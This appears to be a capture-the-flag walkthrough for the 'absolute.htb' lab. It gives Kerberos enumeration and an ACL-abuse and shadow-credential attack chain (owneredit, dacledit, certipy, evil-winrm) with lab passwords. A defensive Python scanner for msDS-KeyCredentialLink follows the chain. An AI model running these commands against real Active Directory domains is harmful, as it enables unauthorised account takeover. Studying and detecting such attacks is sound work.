Kerberos based Enum and Attack Samples
ACL Abuse and Shadow Credential
Preparation
# Get TGT for a user
impacket-getTGT 'absolute.htb/d.klay:Darkmoonsky248girl' -dc-ip $RHOST
# Point the Kerberos credential cache at the saved ticket (nothing is injected into memory; impacket, crackmapexec and certipy read $KRB5CCNAME)
export KRB5CCNAME=./d.klay.ccache
Enumeration
LDAP
crackmapexec ldap dc.absolute.htb --use-kcache --users

SMB
crackmapexec smb dc.absolute.htb --use-kcache --shares

Bloodhound
bloodhound.py -k -u m.lovegod -p AbsoluteLDAP2022! --auth-method kerberos -d absolute.htb -dc dc.absolute.htb -ns 10.129.228.64 --dns-tcp --zip -c All
Exploitation - ACL Abuse and Shadow Credential
The Bloodhound result below shows that m.lovegod owns the Network Audit group, and that the group has GenericWrite
on the winrm_user user.
To get access to the machine, I'll first use that ownership to give m.lovegod write access on the Network Audit group's DACL. Then I can add m.lovegod to the group. Finally, I can use the group's GenericWrite to write a shadow credential onto the winrm_user account and log in via evil-winrm.

Set m.lovegod as the owner of the group. The owner of an AD object can always rewrite its DACL, which is what the next step needs.
# Domain: absolute.htb
# User: m.lovegod
# Group: Network Audit
# Action: write the group's owner (nTSecurityDescriptor owner field)
python3 /opt/python/impacket/impacket/examples/owneredit.py -k -no-pass absolute.htb/m.lovegod -dc-ip dc.absolute.htb -new-owner m.lovegod -target 'Network Audit' -action write
Grant the user FullControl over the group by adding an ACE to its DACL.
# Domain: absolute.htb
# User: m.lovegod
# Group: Network Audit
# Action: write a new ACE into the group's DACL
# Right: FullControl
python3 /opt/python/impacket/impacket/examples/dacledit.py -k -no-pass absolute.htb/m.lovegod -dc-ip dc.absolute.htb -principal m.lovegod -target "Network Audit" -action write -rights FullControl
Add the user to the group.
# Domain: absolute.htb
# User: m.lovegod
# Group: Network Audit
Kali> kinit m.lovegod
Kali> net rpc group addmem "Network Audit" -U 'm.lovegod' -k -S dc.absolute.htb m.lovegod
# Verify the membership (newer Samba deprecates -k in favour of --use-kerberos=required)
Kali> net rpc group members "Network Audit" -U 'm.lovegod' --use-kerberos=required -S dc.absolute.htb
Create a Shadow Credential.
# Request a fresh TGT for m.lovegod first: group membership lives in the ticket's PAC, so a TGT issued before the addmem step does not carry Network Audit and the writes below will be denied
impacket-getTGT 'absolute.htb/m.lovegod:AbsoluteLDAP2022!' -dc-ip $RHOST
export KRB5CCNAME=./m.lovegod.ccache
# Enumerate the ADCS environment. Shadow Credentials need PKINIT on the DC, so you want to see ADCS configuration here.
certipy find -username m.lovegod@absolute.htb -k -target dc.absolute.htb
# Add the shadow credential (a key in msDS-KeyCredentialLink) to winrm_user; certipy then authenticates with that key via PKINIT, recovers the NT hash and writes winrm_user.ccache
certipy shadow auto -username m.lovegod@absolute.htb -account winrm_user -k -target dc.absolute.htb
# Connect to the machine with the winrm_user TGT (evil-winrm's -r needs the realm in /etc/krb5.conf)
KRB5CCNAME=./winrm_user.ccache evil-winrm -i dc.absolute.htb -r absolute.htb
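The chain above ends with a write to the target's msDS-KeyCredentialLink attribute. The Python below is an example added to these notes (not code from the original page or from certipy) that serialises and parses the KEYCREDENTIALLINK_BLOB structure that attribute holds (MS-ADTS 2.2.20), checks the embedded KeyId and KeyHash, and flags keys with a fresh KeyCreationTime, which is how a defender would sweep the directory for a shadow credential. The key material, device GUID, timestamp and the winrm_user DN in the sample value are constructed placeholders, not data read from absolute.htb.

```python
"""Parse and sanity-check msDS-KeyCredentialLink values (KEYCREDENTIALLINK_BLOB, MS-ADTS 2.2.20).

Added example; not from the original notes or from certipy. The sample value at the bottom is
constructed with placeholder key material and a made-up device GUID so the script runs offline.
"""
import hashlib
import struct
import uuid
from datetime import datetime, timedelta, timezone

# KEYCREDENTIALLINK_ENTRY identifiers (MS-ADTS 2.2.20.6)
KEY_ID, KEY_HASH, KEY_MATERIAL, KEY_USAGE, KEY_SOURCE = 0x01, 0x02, 0x03, 0x04, 0x05
DEVICE_ID, CUSTOM_KEY_INFO, LAST_LOGON, CREATION_TIME = 0x06, 0x07, 0x08, 0x09
KEY_USAGE_NAMES = {0x01: "NGC", 0x02: "STK", 0x03: "BitLockerRecovery", 0x07: "FIDO", 0x08: "FEK"}
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def _entry(identifier, value):
    """One KEYCREDENTIALLINK_ENTRY: Length (uint16 LE), Identifier (uint8), Value."""
    return struct.pack("<HB", len(value), identifier) + value


def _to_filetime(dt):
    """UTC datetime -> FILETIME (100 ns ticks since 1601-01-01), in exact integer arithmetic."""
    delta = dt - FILETIME_EPOCH
    return (delta.days * 86400 + delta.seconds) * 10_000_000 + delta.microseconds * 10


def build_key_credential(key_material, device_id, created):
    """Serialise a version 2 blob as a shadow-credential tool writes it: NGC key, AD source.
    KeyId is SHA-256 of KeyMaterial; KeyHash is SHA-256 over every entry that follows it."""
    filetime = struct.pack("<Q", _to_filetime(created))
    tail = (
        _entry(KEY_MATERIAL, key_material)
        + _entry(KEY_USAGE, b"\x01")            # 0x01 = NGC (Windows Hello for Business key)
        + _entry(KEY_SOURCE, b"\x00")           # 0x00 = key registered in on-prem AD
        + _entry(DEVICE_ID, device_id.bytes_le)
        + _entry(CUSTOM_KEY_INFO, b"\x01\x00")  # version 1, no flags
        + _entry(LAST_LOGON, filetime)
        + _entry(CREATION_TIME, filetime)
    )
    return (struct.pack("<I", 0x200)
            + _entry(KEY_ID, hashlib.sha256(key_material).digest())
            + _entry(KEY_HASH, hashlib.sha256(tail).digest())
            + tail)


def parse_dn_binary(value):
    """Split an LDAP DN-Binary string 'B:<hex char count>:<hex>:<DN>' into (blob, DN)."""
    tag, hex_len, hex_blob, dn = value.split(":", 3)
    if tag != "B" or int(hex_len) != len(hex_blob):
        raise ValueError("malformed DN-Binary value")
    return bytes.fromhex(hex_blob), dn


def parse_key_credential(blob):
    """Walk the entries of a KEYCREDENTIALLINK_BLOB and verify KeyId and KeyHash."""
    (version,) = struct.unpack_from("<I", blob, 0)
    if version != 0x200:
        raise ValueError(f"unsupported KEYCREDENTIALLINK_BLOB version 0x{version:x}")
    entries, offset, hashed_from = {}, 4, None
    while offset < len(blob):
        length, identifier = struct.unpack_from("<HB", blob, offset)
        offset += 3
        entries[identifier] = blob[offset:offset + length]
        offset += length
        if identifier == KEY_HASH:
            hashed_from = offset  # KeyHash covers everything after its own entry
    key_id_ok = entries.get(KEY_ID) == hashlib.sha256(entries[KEY_MATERIAL]).digest()
    key_hash_ok = (hashed_from is not None
                   and entries[KEY_HASH] == hashlib.sha256(blob[hashed_from:]).digest())
    created_ticks = struct.unpack("<Q", entries[CREATION_TIME])[0]
    return {
        "key_id": entries[KEY_ID].hex(),
        "key_usage": KEY_USAGE_NAMES.get(entries[KEY_USAGE][0], "unknown"),
        "key_source": "AD" if entries.get(KEY_SOURCE) == b"\x00" else "AzureAD",
        "device_id": str(uuid.UUID(bytes_le=entries[DEVICE_ID])),
        "created": FILETIME_EPOCH + timedelta(microseconds=created_ticks // 10),
        "integrity_ok": key_id_ok and key_hash_ok,
    }


def find_recent_keys(attribute_values, now, max_age_days=1):
    """Flag values whose KeyCreationTime is within max_age_days of `now` (tz-aware UTC).
    A fresh NGC key on a user that never enrolled in Windows Hello for Business is the
    footprint a shadow-credential write leaves behind."""
    flagged = []
    for value in attribute_values:
        blob, dn = parse_dn_binary(value)
        info = parse_key_credential(blob)
        if now - info["created"] <= timedelta(days=max_age_days):
            flagged.append({"dn": dn, **info})
    return flagged


# Constructed sample: placeholder bytes stand in for the BCRYPT_RSAKEY_BLOB a real key carries.
SAMPLE_KEY_MATERIAL = b"CONSTRUCTED-PLACEHOLDER-KEY-MATERIAL-NOT-A-REAL-RSA-BLOB"
SAMPLE_DEVICE_ID = uuid.UUID("8d5f2b7e-1c3a-4f6e-9a0b-2c4d6e8f0a1b")
SAMPLE_CREATED = datetime(2022, 9, 10, 14, 30, tzinfo=timezone.utc)
SAMPLE_BLOB = build_key_credential(SAMPLE_KEY_MATERIAL, SAMPLE_DEVICE_ID, SAMPLE_CREATED)
SAMPLE_VALUE = (f"B:{2 * len(SAMPLE_BLOB)}:{SAMPLE_BLOB.hex().upper()}:"
                "CN=winrm_user,CN=Users,DC=absolute,DC=htb")
```

Feed `find_recent_keys` the msDS-KeyCredentialLink values pulled from LDAP for all user objects (the attribute is multi-valued, one DN-Binary string per key) and review any hit on an account that should not hold a Windows Hello for Business key. Note that `certipy shadow auto` restores the attribute once it has the NT hash, so a point-in-time sweep only catches keys that were left in place; for the transient case, audit directory modifications (Security event 5136 on msDS-KeyCredentialLink) as well.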